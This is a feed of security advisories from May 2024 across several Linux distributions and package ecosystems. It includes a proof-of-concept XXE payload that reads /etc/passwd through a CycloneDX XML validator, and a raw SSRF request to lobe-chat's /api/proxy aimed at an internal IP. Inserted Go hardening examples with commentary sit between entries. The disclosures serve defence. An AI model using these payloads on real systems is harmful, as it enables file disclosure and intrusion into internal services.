06.05.2024 12:33:30 | suse | [SUSE-SU-2024:1506-1] Security update for the Linux Kernel (Live Patch 44 for SLE 15 SP2) (important) | Security update for the Linux Kernel (Live Patch 44 for SLE 15 SP2) | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1506-1
06.05.2024 12:33:25 | suse | [SUSE-SU-2024:1505-1] Security update for the Linux Kernel (Live Patch 42 for SLE 12 SP5) (important) | Security update for the Linux Kernel (Live Patch 42 for SLE 12 SP5) | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1505-1
06.05.2024 11:58:33 | suse | [SUSE-SU-2024:1500-1] Security update for avahi (moderate) | Security update for avahi | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1500-1
06.05.2024 10:44:57 | suse | [SUSE-SU-2024:1499-1] Security update for java-17-openjdk (low) | Security update for java-17-openjdk | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1499-1
06.05.2024 10:42:13 | suse | [SUSE-SU-2024:1498-1] Security update for java-11-openjdk (low) | Security update for java-11-openjdk | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1498-1
06.05.2024 10:40:10 | suse | [SUSE-SU-2024:1497-1] Security update for skopeo (important) | Security update for skopeo | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1497-1
06.05.2024 03:00:00 | debian | [DSA-5681-1] linux (high) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5681-1
06.05.2024 03:00:00 | debian | [DSA-5680-1] linux (medium) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5680-1
06.05.2024 03:00:00 | gentoo | [GLSA-202405-17] glibc: Multiple Vulnerabilities (high) | Multiple vulnerabilities have been discovered in glibc, the worst of which could lead to remote code execution. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-17
05.05.2024 14:33:22 | suse | [SUSE-SU-2024:1493-1] Security update for the Linux Kernel (Live Patch 42 for SLE 15 SP2) (important) | Security update for the Linux Kernel (Live Patch 42 for SLE 15 SP2) | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1493-1
08.05.2024 23:42:00 | go | [GO-2024-2819] Denial of Service in github.com/ethereum/go-ethereum (high) | A vulnerable node can be made to consume very large amounts of memory when handling specially crafted p2p messages sent from an attacker node. This can result in a denial of service as the node runs out of memory. | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2819
08.05.2024 22:55:37 | npm | [NPM:GHSA-38GF-RH2W-GMJ7] @cyclonedx/cyclonedx-library Improper Restriction of XML External Entity Reference vulnerability (high)

### Impact
XML External entity injections could be possible, when running the provided XML Validator on arbitrary input.

#### POC
```js
const { Spec: { Version }, Validation: { XmlValidator } } = require('@cyclonedx/cyclonedx-library');

const version = Version.v1dot5;
const validator = new XmlValidator(version);

// A CycloneDX 1.5 BOM whose DOCTYPE declares an external entity pointing at a local file.
const input = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poc [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5">
  <components>
    <component type="library">
      <name>testing</name>
      <version>1.337</version>
      <licenses>
        <license>
          <id>&xxe;</id><!-- << XML external entity (XXE) injection -->
        </license>
      </licenses>
    </component>
  </components>
</bom>`;

// validating this forged(^) input might lead to unintended behaviour
// for the fact that the XML external entity would be taken into account.
validator.validate(input).then(ve => {
  console.error('validation error', ve);
});
```

### Patches
This issue was fixed in `@cyclonedx/cyclonedx-library@6.7.1`.

### Workarounds
Do not run the provided XML validator on untrusted inputs.

### References
* issue was introduced via <https://github.com/CycloneDX/cyclonedx-javascript-library/pull/1063>.

Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-38GF-RH2W-GMJ7
08.05.2024 22:57:07 | maven | [MAVEN:GHSA-FGH3-PWMP-3QW3] Apache Inlong Deserialization of Untrusted Data vulnerability (high) | Deserialization of Untrusted Data vulnerability in Apache InLong. This issue affects Apache InLong: from 1.7.0 through 1.11.0. The attackers can bypass using malicious parameters. Users are advised to upgrade to Apache InLong's 1.12.0 or cherry-pick [1], [2] to solve it. [1] https://github.com/apache/inlong/pull/9694 [2] https://github.com/apache/inlong/pull/9707 | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-FGH3-PWMP-3QW3
08.05.2024 08:25:20 | go | [GO-2024-2818] Consensus failures in github.com/btcsuite/btcd | Incorrect implementation of the consensus rules outlined in BIP 68 and BIP 112 making btcd susceptible to consensus failures. Specifically, it uses the transaction version as a signed integer when it is supposed to be treated as unsigned. There can be a chain split and loss of funds. | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2818
08.05.2024 03:00:00 | debian | [DSA-5684-1] webkit2gtk (high) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5684-1
08.05.2024 03:00:00 | debian | [DSA-5685-1] wordpress (high) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5685-1
08.05.2024 03:00:00 | debian | [DSA-5683-1] chromium | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5683-1
08.05.2024 03:00:00 | gentoo | [GLSA-202405-26] qtsvg: Multiple Vulnerabilities (normal) | Multiple vulnerabilities have been discovered in qtsvg, the worst of which could lead to a denial of service. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-26
08.05.2024 03:00:00 | gentoo | [GLSA-202405-21] Commons-BeanUtils: Improper Access Restriction (normal) | A vulnerability has been discovered in Commons-BeanUtils, which could lead to execution of arbitrary code. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-21
08.05.2024 03:00:00 | gentoo | [GLSA-202405-22] rsync: Multiple Vulnerabilities (normal) | Multiple vulnerabilities have been discovered in rsync, the worst of which can lead to denial of service or information disclosure. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-22
08.05.2024 03:00:00 | gentoo | [GLSA-202405-23] U-Boot tools: double free vulnerability (normal) | A vulnerability has been discovered in U-Boot tools which can lead to execution of arbitrary code. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-23
08.05.2024 03:00:00 | gentoo | [GLSA-202405-24] ytnef: Multiple Vulnerabilities (normal) | Multiple vulnerabilities have been discovered in ytnef, the worst of which could potentially lead to remote code execution. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-24
08.05.2024 03:00:00 | gentoo | [GLSA-202405-25] MariaDB: Multiple Vulnerabilities (normal) | Multiple vulnerabilities have been discovered in MariaDB, the worst of which can lead to arbitrary execution of code. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-25
08.05.2024 03:00:00 | gentoo | [GLSA-202405-27] Epiphany: Buffer Overflow (normal) | A vulnerability has been discovered in Epiphany, which can lead to a buffer overflow. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-27
08.05.2024 03:00:00 | gentoo | [GLSA-202405-28] NVIDIA Drivers: Multiple Vulnerabilities (normal) | Multiple vulnerabilities have been discovered in NVIDIA Drivers, the worst of which could result in root privilege escalation. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-28
08.05.2024 03:00:00 | gentoo | [GLSA-202405-29] Node.js: Multiple Vulnerabilities (low) | Multiple vulnerabilities have been discovered in Node.js. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-29
08.05.2024 00:05:52 | go | [GO-2024-2825] Arbitrary code execution during build on Darwin in cmd/go | On Darwin, building a Go module which contains CGO can trigger arbitrary code execution when using the Apple version of ld, due to usage of the -lto_library flag in a "#cgo LDFLAGS" directive. | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2825
08.05.2024 22:52:53 | go | [GO-2024-2824] Malformed DNS message can cause infinite loop in net | A malformed DNS message in response to a query can cause the Lookup functions to get stuck in an infinite loop. | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2824
08.05.2024 21:59:10 | maven | [MAVEN:GHSA-VPW3-3PRF-3974] Apache Hive Code Injection vulnerability (moderate) | Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Hive. The vulnerability affects the Hive JDBC driver component and it can potentially lead to arbitrary code execution on the machine/endpoint on which the JDBC driver (client) is running. The malicious user must have sufficient permissions to specify/edit JDBC URL(s) in an endpoint relying on the Hive JDBC driver, and the JDBC client process must run under a privileged user to fully exploit the vulnerability. The attacker can set up a malicious HTTP server and specify a JDBC URL pointing towards this server. When a JDBC connection is attempted, the malicious HTTP server can provide a special response with a customized payload that can trigger the execution of certain commands in the JDBC client. This issue affects Apache Hive: from 4.0.0-alpha-1 before 4.0.0. Users are recommended to upgrade to version 4.0.0, which fixes the issue. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-VPW3-3PRF-3974
08.05.2024 03:00:00 | freebsd | [FREEBSD:059A99A9-45E0-492B-B9F9-5A79573C8EB6] electron29 -- multiple vulnerabilities | Electron developers report: This update fixes the following vulnerabilities: Security: backported fix for CVE-2024-4060. Security: backported fix for CVE-2024-4058. | https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:059A99A9-45E0-492B-B9F9-5A79573C8EB6
10.05.2024 23:17:50 | go | [GO-2024-2800] Argument injection when fetching remote default Git branches in github.com/hashicorp/go-getter (critical) | When go-getter is performing a Git operation, go-getter will try to clone the given repository. If a Git reference is not passed along with the Git url, go-getter will then try to check the remote repository's HEAD reference of its default branch by passing arguments to the Git binary on the host it is executing on. An attacker may format a Git URL in order to inject additional Git arguments to the Git call. | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2800
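The go-getter entry above is a textbook argument injection: a user-controlled string lands in an argv position where git's option parser can read it as a flag. As an added example, not go-getter's own code or its fix, the Go snippet below shows how a caller that needs the same "default branch of a remote" query (`git ls-remote --symref <url> HEAD`) would harden the argv construction: reject dash-prefixed positional values outright, and place the untrusted value after `--` so option parsing stops before it (this assumes git's standard end-of-options handling). The repository URL and the `ls-remote` output are constructed samples; no git process is run.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// ErrDashArg is returned when a user-controlled value would be read by git's
// option parser as a flag instead of as a repository URL.
var ErrDashArg = errors.New("git positional argument must not start with '-'")

// checkPositional rejects empty values and anything that looks like an option.
// Assumption (not from the advisory): the URL is the only untrusted input here.
func checkPositional(name, v string) error {
	if v == "" {
		return fmt.Errorf("%s is empty", name)
	}
	if strings.HasPrefix(v, "-") {
		return fmt.Errorf("%s %q: %w", name, v, ErrDashArg)
	}
	return nil
}

// DefaultBranchArgs builds argv for `git ls-remote --symref -- <url> HEAD`,
// the query used to learn which branch a remote's HEAD points at. The "--"
// is defence in depth: even if a dash-prefixed value slipped through, git
// would no longer parse it as an option.
func DefaultBranchArgs(repoURL string) ([]string, error) {
	if err := checkPositional("repository URL", repoURL); err != nil {
		return nil, err
	}
	return []string{"ls-remote", "--symref", "--", repoURL, "HEAD"}, nil
}

// ParseSymref extracts the default branch from `git ls-remote --symref`
// output, whose symbolic-ref line has the form "ref: refs/heads/<name>\tHEAD".
func ParseSymref(out string) (string, error) {
	for _, line := range strings.Split(out, "\n") {
		if !strings.HasPrefix(line, "ref: ") {
			continue
		}
		fields := strings.Fields(strings.TrimPrefix(line, "ref: "))
		if len(fields) == 2 && fields[1] == "HEAD" {
			return strings.TrimPrefix(fields[0], "refs/heads/"), nil
		}
	}
	return "", errors.New("no symbolic HEAD ref in ls-remote output")
}

func main() {
	// Constructed sample output; a real caller would feed exec.Command("git", args...).Output() here.
	const sample = "ref: refs/heads/main\tHEAD\n0123456789abcdef0123456789abcdef01234567\tHEAD\n"

	args, err := DefaultBranchArgs("https://example.com/org/repo.git")
	fmt.Println(args, err)
	fmt.Println(ParseSymref(sample))

	// A dash-prefixed "URL" is refused before it can reach git.
	_, err = DefaultBranchArgs("--not-a-url")
	fmt.Println(err)
}
```

The rejection check is the primary control; `--` only protects the subcommands whose parser honours it, so it should never be the sole defence when the URL also flows into other git invocations.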
10.05.2024 23:10:50 | go | [GO-2024-2638] ValidateVoteExtensions function in Cosmos SDK may allow incorrect voting power assumptions in github.com/cosmos/cosmos-sdk | The default ValidateVoteExtensions helper function infers total voting power based on the injected VoteExtension, which are injected by the proposer. If your chain utilizes the ValidateVoteExtensions helper in ProcessProposal, a dishonest proposer can potentially mutate voting power of each validator it includes in the injected VoteExtension, which could have potentially unexpected or negative consequences on modified state. Additional validation on injected VoteExtension data was added to confirm voting power against the state machine. | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2638
10.05.2024 22:15:01 | go | [GO-2024-2826] Denial of service attack by triggering unbounded memory usage in vitess.io/vitess (medium) | When executing a query, the vtgate will go into an endless loop that also keeps consuming memory and eventually will OOM. This causes a denial of service. | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2826
10.05.2024 18:29:53 | npm | [NPM:GHSA-MXHQ-XW3G-RPHC] lobe-chat `/api/proxy` endpoint Server-Side Request Forgery vulnerability (critical)

### Summary
The latest version of lobe-chat (by now v0.141.2) has an unauthorized SSRF vulnerability. An attacker can construct malicious requests to cause SSRF without logging in, attack intranet services, and leak sensitive information.

### Details
* visit https://chat-preview.lobehub.com/settings/agent
* you can attack all internal services by /api/proxy and get the echo in the HTTP response 🙂

![image](https://github.com/lobehub/lobe-chat/assets/55245002/c2894c34-7333-4ae1-864c-3b212b95eb21)
![image](https://github.com/lobehub/lobe-chat/assets/55245002/dd9ad696-7180-4700-8bff-1171a6a8ac91)
![image](https://github.com/lobehub/lobe-chat/assets/55245002/e2b97520-a6d5-4939-8313-46db8a1c4b75)

### PoC
```http
POST /api/proxy HTTP/2
Host: xxxxxxxxxxxxxxxxx
Cookie: LOBE_LOCALE=zh-CN; LOBE_THEME_PRIMARY_COLOR=undefined; LOBE_THEME_NEUTRAL_COLOR=undefined; _ga=GA1.1.86608329.1711346216; _ga_63LP1TV70T=GS1.1.1711346215.1.1.1711346846.0.0.0
Content-Length: 23
Sec-Ch-Ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://chat-preview.lobehub.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://chat-preview.lobehub.com/settings/agent
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7

http://172.23.0.1:8000/
```

### Impact
SSRF. All users will be impacted.

Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MXHQ-XW3G-RPHC
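The PoC above works because the proxy endpoint forwards whatever URL it is handed, including one whose body is a private address. As an added example, not lobe-chat's code or its patch, the Go snippet below shows the two checks a URL-proxying endpoint needs so it cannot be turned into an SSRF primitive: a pre-flight check on the submitted URL (scheme allowlist, IP literals screened), and a check in the dialer's `Control` hook on the address actually being connected to, which is what stops a public hostname that resolves, or is later rebound, to 172.23.0.1 or the link-local metadata range. All addresses used are constructed samples and nothing is dialed.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/http"
	"net/netip"
	"net/url"
	"syscall"
	"time"
)

// ErrBlockedTarget marks destinations a proxy endpoint must never reach.
var ErrBlockedTarget = errors.New("proxy target is not a public unicast address")

// checkIP rejects loopback, private (RFC 1918 and fc00::/7), link-local (which
// covers 169.254.169.254 metadata services), multicast and unspecified addresses.
// IPv4-mapped IPv6 addresses are unmapped first so ::ffff:127.0.0.1 is caught too.
func checkIP(ip netip.Addr) error {
	ip = ip.Unmap()
	if ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() ||
		ip.IsMulticast() || ip.IsUnspecified() {
		return fmt.Errorf("%s: %w", ip, ErrBlockedTarget)
	}
	return nil
}

// checkDialAddr validates the "ip:port" string the dialer is about to connect
// to. DNS has already been resolved at this point, so a hostname that points
// at an internal address (or is rebound to one on a later lookup) is still blocked.
func checkDialAddr(address string) error {
	host, _, err := net.SplitHostPort(address)
	if err != nil {
		return err
	}
	ip, err := netip.ParseAddr(host)
	if err != nil {
		return fmt.Errorf("%q is not an IP literal: %w", host, err)
	}
	return checkIP(ip)
}

// checkTargetURL is the cheap pre-flight check on the user-supplied URL:
// http(s) only, a host must be present, and IP literals are screened early.
// Hostnames are deliberately not resolved here; the dialer hook handles them.
func checkTargetURL(raw string) (*url.URL, error) {
	u, err := url.Parse(raw)
	if err != nil {
		return nil, err
	}
	if u.Scheme != "http" && u.Scheme != "https" {
		return nil, fmt.Errorf("scheme %q not allowed", u.Scheme)
	}
	if u.Hostname() == "" {
		return nil, errors.New("target URL has no host")
	}
	if ip, err := netip.ParseAddr(u.Hostname()); err == nil {
		if err := checkIP(ip); err != nil {
			return nil, err
		}
	}
	return u, nil
}

// newProxyClient returns an http.Client whose every connection, including the
// ones made while following redirects, passes through checkDialAddr.
func newProxyClient() *http.Client {
	d := &net.Dialer{
		Timeout: 5 * time.Second,
		Control: func(network, address string, _ syscall.RawConn) error {
			return checkDialAddr(address)
		},
	}
	return &http.Client{
		Timeout:   10 * time.Second,
		Transport: &http.Transport{DialContext: d.DialContext},
	}
}

func main() {
	// Constructed targets; nothing here touches the network.
	for _, raw := range []string{"http://172.23.0.1:8000/", "file:///etc/passwd", "https://example.com/"} {
		_, err := checkTargetURL(raw)
		fmt.Printf("%-26s -> %v\n", raw, err)
	}
	fmt.Println(checkDialAddr("169.254.169.254:80"))
	_ = newProxyClient()
}
```

The dial-time check is the one that matters: a URL-level denylist alone is bypassed by any hostname the attacker controls, and by redirects from a public server to an internal one.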
10.05.2024 17:34:31 | rockylinux | [RLSA-2024:1427] libreoffice security update (important) | An update is available for libreoffice. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1427
10.05.2024 17:34:31 | rockylinux | [RLBA-2023:7750] xfsdump bug fix and enhancement update (none) | An update is available for xfsdump. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:7750
10.05.2024 17:34:23 | rockylinux | [RLBA-2023:6386] clevis bug fix and enhancement update (none) | An update is available for clevis. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6386
10.05.2024 17:34:23 | rockylinux | [RLBA-2023:6393] python-into-dbus-python bug fix and enhancement update (none) | An update is available for python-into-dbus-python. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6393
10.05.2024 17:34:23 | rockylinux | [RLBA-2023:6439] gcc-toolset-13 bug fix and enhancement update (none) | An update is available for gcc-toolset-13. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6439
10.05.2024 17:34:23 | rockylinux | [RLBA-2023:6509] libcanberra bug fix and enhancement update (none) | An update is available for libcanberra. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2023:6509
10.05.2024 17:34:23 | rockylinux | [RLSA-2023:6539] perl-CPAN security update (moderate) | An update is available for perl-CPAN. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2023:6539
10.05.2024 17:34:23 | rockylinux | [RLSA-2024:1139] keylime security update (low) | An update is available for keylime. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1139
10.05.2024 17:34:24 | rockylinux | [RLSA-2024:1502] grafana-pcp security update (important) | An update is available for grafana-pcp. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1502
10.05.2024 17:34:24 | rockylinux | [RLBA-2024:2058] nss bug fix update (none) | An update is available for nss. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2058
10.05.2024 17:34:23 | rockylinux | [RLSA-2023:7712] tracker-miners security update (important) | An update is available for tracker-miners. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2023:7712
10.05.2024 17:34:23 | rockylinux | [RLSA-2024:0675] gimp security update (important) | An update is available for gimp. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:0675
10.05.2024 17:34:23 | rockylinux | [RLSA-2024:1436] postgresql-jdbc security update (important) | An update is available for postgresql-jdbc. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1436
10.05.2024 17:34:24 | rockylinux | [RLSA-2024:1908] firefox security update (important) | An update is available for firefox. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1908
10.05.2024 17:34:24 | rockylinux | [RLSA-2024:1940] thunderbird security update (low) | An update is available for thunderbird. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1940
10.05.2024 17:34:24 | rockylinux | [RLBA-2024:2087] container-selinux bug fix update (none) | An update is available for container-selinux. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2087
10.05.2024 17:34:24 | rockylinux | [RLBA-2024:2124] crun bug fix and enhancement update (none) | An update is available for crun. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2124
10.05.2024 17:34:24 | rockylinux | [RLBA-2024:2140] netavark bug fix and enhancement update (none) | An update is available for netavark. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2140
10.05.2024 17:34:24 | rockylinux | [RLBA-2024:2150] python-virt-firmware bug fix and enhancement update (none) | An update is available for python-virt-firmware. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2150
10.05.2024 17:34:25 | rockylinux | [RLBA-2024:2155] python-drgn bug fix and enhancement update (none) | An update is available for python-drgn. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2155
10.05.2024 17:34:24 | rockylinux | [RLSA-2024:2135] qemu-kvm security update (moderate) | An update is available for qemu-kvm. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2135
10.05.2024 17:34:25 | rockylinux | [RLBA-2024:2168] libva bug fix and enhancement update (none) | An update is available for libva. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2168
10.05.2024 17:34:25 | rockylinux | [RLBA-2024:2189] systemtap bug fix and enhancement update (none) | An update is available for systemtap. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2189
10.05.2024 17:34:25 | rockylinux | [RLBA-2024:2194] lorax bug fix and enhancement update (none) | An update is available for lorax. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2194
10.05.2024 17:34:25 | rockylinux | [RLBA-2024:2195] checkpolicy bug fix and enhancement update (none) | An update is available for checkpolicy. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2195
10.05.2024 17:34:25 | rockylinux | [RLBA-2024:2192] mstflint bug fix and enhancement update (none) | An update is available for mstflint. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2192
10.05.2024 17:34:25 | rockylinux | [RLBA-2024:2224] cmake bug fix and enhancement update (none) | An update is available for cmake. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2224
10.05.2024 17:34:25 | rockylinux | [RLEA-2024:2221] gcc-toolset-13-annobin bug fix and enhancement update (none) | An update is available for gcc-toolset-13-annobin. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLEA-2024:2221
10.05.2024 17:34:25 | rockylinux | [RLBA-2024:2220] ipa-healthcheck bug fix and enhancement update (none) | An update is available for ipa-healthcheck. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2220
10.05.2024 17:34:25 | rockylinux | [RLBA-2024:2227] rhel-system-roles bug fix and enhancement update (none) | An update is available for rhel-system-roles. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2227
10.05.2024 17:34:25rockylinux[RLBA-2024:2240] git bug fix and enhancement update (none)An update is available for git.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2240
10.05.2024 17:34:26rockylinux[RLBA-2024:2251] resteasy bug fix and enhancement update (none)An update is available for resteasy.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2251
10.05.2024 17:34:26rockylinux[RLBA-2024:2248] gtk4 bug fix and enhancement update (none)An update is available for gtk4.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2248
10.05.2024 17:34:26rockylinux[RLBA-2024:2249] debugedit bug fix and enhancement update (none)An update is available for debugedit.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2249
10.05.2024 17:34:26rockylinux[RLBA-2024:2250] pki-core bug fix and enhancement update (none)An update is available for pki-core.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2250
10.05.2024 17:34:26rockylinux[RLBA-2024:2265] NetworkManager-libreswan bug fix and enhancement update (none)An update is available for NetworkManager-libreswan.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE listhttps://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2265
